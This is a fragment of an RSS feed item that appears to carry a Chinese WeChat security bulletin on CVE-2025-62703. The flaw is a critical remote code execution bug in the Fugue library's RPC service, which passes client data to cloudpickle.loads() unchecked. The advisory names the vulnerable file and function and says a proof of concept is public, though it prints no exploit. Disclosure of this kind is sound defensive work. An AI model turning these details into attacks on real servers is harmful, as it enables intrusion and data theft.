[]&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Fugue Pickle 反序列化远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-62703）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/fugue-project/fugue/commit/6f25326779fd1f528198098d6287c5a863176fc0" target="_blank">https://github.com/fugue-project/fugue/commit/6f25326779fd1f528198098d6287c5a863176fc0</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Fugue 分布式计算框架被披露其存在反序列化远程代码执行漏洞，漏洞编号CVE-2025-62703。可导致远程攻击者执行任意代码等危害。Fugue 是一个用于分布式计算的 Python 库，它作为一个抽象层，让用户能用统一的 Python 或 SQL 接口编写代码，然后无缝地在 Pandas、Spark 或 Dask 等多种计算引擎上运行，从而简化分布式应用的开发。 据官方描述，在 Fugue 分布式计算框架 0.9.2 及之前的版本的 RPC 服务组件（fugue/rpc/flask.py）中，由于其在核心通信机制中直接使用未经安全处理的 cloudpickle.loads() 方法反序列化客户端数据（位于 _decode() 函数），而未能对输入内容进行任何验证或实施安全限制，当攻击者构造包含恶意序列化 Python 对象的 RPC 请求时，服务端在反序列化过程中会直接执行对象中包含的任意代码，最终造成攻击者可在服务端远程执行系统命令、完全控制系统、窃取敏感数据或在网络中进行横向移动等。 目前该漏洞的漏洞细节、POC已公开。</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247510975">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=06d892a2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510975%26idx%3D1%26sn%3D27789bf6e0651802ecc7b2c609e15c62">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 01 Dec 2025 16:30:00 +0800</pubDate>
    </item>
  </channel>
</rss>